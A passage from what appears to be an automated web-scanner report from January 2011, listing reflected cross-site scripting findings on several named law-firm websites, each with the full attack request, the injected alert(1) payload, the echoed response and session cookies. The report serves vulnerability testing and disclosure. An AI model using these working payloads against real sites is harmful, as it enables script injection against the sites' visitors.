<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | Diversity | Recruiting the Best & Brightest</title> ...[SNIP]... ecruitingthebestandbrightest/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/recruitingthebestandbrightest/Diversity.aspx?c57c0'-alert(1)-'7612bb35499=1';//]]> ...[SNIP]...
2.32. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/retainingourdiversetalent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c13f'-alert(1)-'a38ede21cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /retainingourdiversetalent?1c13f'-alert(1)-'a38ede21cf4=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | Diversity | Retaining Our Diverse Talent</title>
...[SNIP]... on = '/retainingourdiversetalent/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/retainingourdiversetalent/Diversity.aspx?1c13f'-alert(1)-'a38ede21cf4=1';//]]> ...[SNIP]...
2.33. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/sitemap
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6862'-alert(1)-'2791e98804b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap?a6862'-alert(1)-'2791e98804b=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.34. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/termsofuse
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce89f'-alert(1)-'5ebc528209d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /termsofuse?ce89f'-alert(1)-'5ebc528209d=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | Terms of Use</title> <meta name="language" con ...[SNIP]... document.aspnetForm.action = '/termsofuse/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/termsofuse/GeneralPageData.aspx?ce89f'-alert(1)-'5ebc528209d=1';//]]> ...[SNIP]...
2.35. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ebglaw.com
Path:
/showoffice.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45f31'><script>alert(1)</script>f88730a84f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=wiqyja45mfzer0uwjqmgms45; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <a href='showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1&PrintPage=True'> ...[SNIP]...
2.36. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ebglaw.com
Path:
/showoffice.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a79d'-alert(1)-'f0c22b0c26f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=xxbjjcegd5hxmw55jxay4l3b; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <350) { location.href='showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1&mobile=True' }
The value of the eTitle request parameter is copied into the HTML document as plain text between tags. The payload 8d254<script>alert(1)</script>39610b88ceb was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E8d254<script>alert(1)</script>39610b88ceb HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D395%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the eTitle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>288abb3048 was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E94895"><script>alert(1)</script>288abb3048 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A16%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D369%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:16 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the fuseaction request parameter is copied into the HTML document as plain text between tags. The payload 6f457<script>alert(1)</script>e9f570c8d27 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site6f457<script>alert(1)</script>e9f570c8d27&site_id=299 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D218%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:02 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
...[SNIP]... </h2>
I received a fuseaction called "news.site6f457<script>alert(1)</script>e9f570c8d27" I don't know what to do with!<br> ...[SNIP]...
The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145fe"><script>alert(1)</script>aed5c335ef1 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site145fe"><script>alert(1)</script>aed5c335ef1&site_id=299 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D210%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:00 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
2.41. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fulbright.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed44"><script>alert(1)</script>c707a822c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site&site_id=299&fed44"><script>alert(1)</script>c707a822c6a=1 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A39%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D575%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the pf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660d3"><script>alert(1)</script>39aa8a72e69 was submitted in the pf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?FUSEACTION=home.299&pf=y660d3"><script>alert(1)</script>39aa8a72e69 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D161%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the rss request parameter is copied into the value of an XML tag attribute which is encapsulated in double quotation marks. The payload 1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 was submitted in the rss parameter. This input was echoed as 1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /index.cfm?fuseaction=news.allrss&site_id=286&rss=y1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A44%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D626%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:44 GMT;path=/ Content-Type: text/xml
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
2.44. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.jonesdaydiversity.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d512'-alert(1)-'f727d73fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2d512'-alert(1)-'f727d73fb9=1 HTTP/1.1 Host: www.jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
<head> <title id="ctl00_htmlTitle">Jones Day Diversity</title> <link rel="stylesheet" ...[SNIP]... <![CDATA[ var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?2d512'-alert(1)-'f727d73fb9=1';//]]> ...[SNIP]...
2.45. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mckennacuneo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b15f'><script>alert(1)</script>1d12d371487 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?5b15f'><script>alert(1)</script>1d12d371487=1 HTTP/1.1 Host: www.mckennacuneo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 16:52:37 GMT Server: Apache/2.2.15 (FreeBSD) X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15847
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.1//EN' 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'> <html xmlns='http://www.w3.org/1999/xhtml'> <head> <meta http-equiv='Content-Type' content='text/html; ...[SNIP]... <a id='emailThisPage' href='/?5b15f'><script>alert(1)</script>1d12d371487=1&email-this-page' rel='nofollow'> ...[SNIP]...
2.46. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.skadden.com
Path:
/2011insights.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86470"-alert(1)-"c4c00aee9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011insights.cfm?86470"-alert(1)-"c4c00aee9af=1 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2C86470%22%2Dalert%281%29%2D%22c4c00aee9af%3D1;expires=Fri, 11-Jan-2041 15:14:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... <script type="text/javascript"> extra = "height="+screen.height+",width="+screen.width+",location=no"; function printWindow(){ window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&86470"-alert(1)-"c4c00aee9af=1","PDF",extra) }
function pdfWindow(url){ window.open(url,"PDF",extra); } </script> ...[SNIP]...
2.47. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.skadden.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bb3"-alert(1)-"0eb36443031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm?contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478%2690bb3%22%2Dalert%281%29%2D%220eb36443031%3D1;expires=Fri, 11-Jan-2041 15:14:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
